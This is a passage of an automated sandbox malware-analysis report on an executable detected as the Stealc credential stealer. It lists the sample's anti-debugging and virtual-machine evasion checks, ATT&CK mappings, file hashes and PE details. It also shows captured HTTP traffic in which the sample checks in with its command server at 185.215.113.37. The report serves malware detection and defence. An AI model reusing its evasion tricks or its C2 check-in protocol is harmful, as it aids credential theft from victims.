                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00FBBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FBDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB1160 GetSystemInfo,ExitProcess,0_2_00FB1160
                Source: file.exe, file.exe, 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW74
                Source: file.exe, 00000000.00000002.1713881816.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1713881816.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13351
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13354
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13371
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13366
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13406
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB45C0 VirtualProtect ?,00000004,00000100,000000000_2_00FB45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FC9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9750 mov eax, dword ptr fs:[00000030h]0_2_00FC9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00FC78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3168, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00FC9600
                Source: file.exe, file.exe, 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00FC7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00FC7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00FC7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00FC7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.fb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1673353364.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3168, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.fb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1673353364.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3168, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe44%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php017%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpW17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.php0file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/wsfile.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpWfile.exe, 00000000.00000002.1713881816.0000000000CE5000.00000004.00000020.00020000.00000000.sdmptrueunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.215.113.37
                		unknownPortugal
                		206894WHOLESALECONNECTIONSNLtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1523127
                Start date and time:2024-10-01 06:56:05 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 2m 34s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:1
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 84
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.945644704303884
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'840'128 bytes
                MD5:e12dff26d257800a0f411dda1fdb521f
                SHA1:ed660b5a175dce979ca5e77f13d2e89b2c8aaadc
                SHA256:e082f507be5674e4813a6f32759c2551bfedea8e298082cab225b787b6e89d60
                SHA512:4771f88f9f2a7fa1a165866c1782564d141d8030ff3110cc5d002f8d0ddf2a5e85d66eabca99d10383cff02e0e4b465b9f896d89b27b2e3e6a767cb1d897728b
                SSDEEP:24576:RkRhl9USnloGAklNG66X57K/zlRvKxh6k3aVa12FDhvH55NQ7DrG3Mp5C2GS2:SbKGBnGpNcbchsIg5hvZ5NEi8p5+
                TLSH:E88533A3950EAEE5C7E061FD980311CBAB6CB115FD8F2EF20FAC644B456673682E1453
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                File Icon

                Icon Hash:90cececece8e8eb0

                Static PE Info

                General

                Entrypoint:0xa94000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b

                Entrypoint Preview

                Instruction
                jmp 00007F65A4809E8Ah
                pslld mm3, qword ptr [ebx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add cl, ch
                add byte ptr [eax], ah
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [ebx+00000004h], bl
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [ecx], al
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                jnle 00007F65A4809E02h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                int 03h
                add byte ptr [eax], al
                push es
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [ecx], al
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add dword ptr [eax+00000000h], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Rich Headers

                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                0x10000x25b0000x22800d7c5e4fd175dd3e4a7c4c35b551ffd41unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                0x25e0000x29a0000x200691ac3fb7a6fe7e23240fa258f37c7a3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                mbunfolu0x4f80000x19b0000x19b0001d95a7236c16f1cd441e48e051424b8cFalse0.9947512735705596data7.952881013739973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                qktpvyhd0x6930000x10000x600cd939201cb228c296873b75d96e61c63False0.5657552083333334data4.952435486423867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant0x6940000x30000x220017b3a57ca9860797039d1ddec5faee39False0.07123161764705882DOS executable (COM)0.8099240214878086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                Imports

                DLLImport
                kernel32.dlllstrcpy

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-01T06:56:59.379515+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 1, 2024 06:56:58.444952011 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 06:56:58.449980021 CEST8049730185.215.113.37192.168.2.4
                Oct 1, 2024 06:56:58.450126886 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 06:56:58.450273991 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 06:56:58.455061913 CEST8049730185.215.113.37192.168.2.4
                Oct 1, 2024 06:56:59.149878979 CEST8049730185.215.113.37192.168.2.4
                Oct 1, 2024 06:56:59.149955988 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 06:56:59.152244091 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 06:56:59.157118082 CEST8049730185.215.113.37192.168.2.4
                Oct 1, 2024 06:56:59.379400969 CEST8049730185.215.113.37192.168.2.4
                Oct 1, 2024 06:56:59.379514933 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 06:57:01.801373959 CEST4973080192.168.2.4185.215.113.37

                HTTP Request Dependency Graph

                • 185.215.113.37

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449730185.215.113.37803168C:\Users\user\Desktop\file.exe
                TimestampBytes transferredDirectionData
                Oct 1, 2024 06:56:58.450273991 CEST89OUTGET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 1, 2024 06:56:59.149878979 CEST203INHTTP/1.1 200 OK
                Date: Tue, 01 Oct 2024 04:56:59 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 1, 2024 06:56:59.152244091 CEST411OUTPOST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDH
                Host: 185.215.113.37
                Content-Length: 210
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 43 41 44 32 37 46 37 33 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 2d 2d 0d 0a
                Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="hwid"B3CAD27F7324796922796------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="build"doma------IIIECAAKECFHIECBKJDH--
                Oct 1, 2024 06:56:59.379400969 CEST210INHTTP/1.1 200 OK
                Date: Tue, 01 Oct 2024 04:56:59 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Target ID:0
                Start time:00:56:54
                Start date:01/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0xfb0000
                File size:1'840'128 bytes
                MD5 hash:E12DFF26D257800A0F411DDA1FDB521F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1673353364.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:8.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:10.1%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
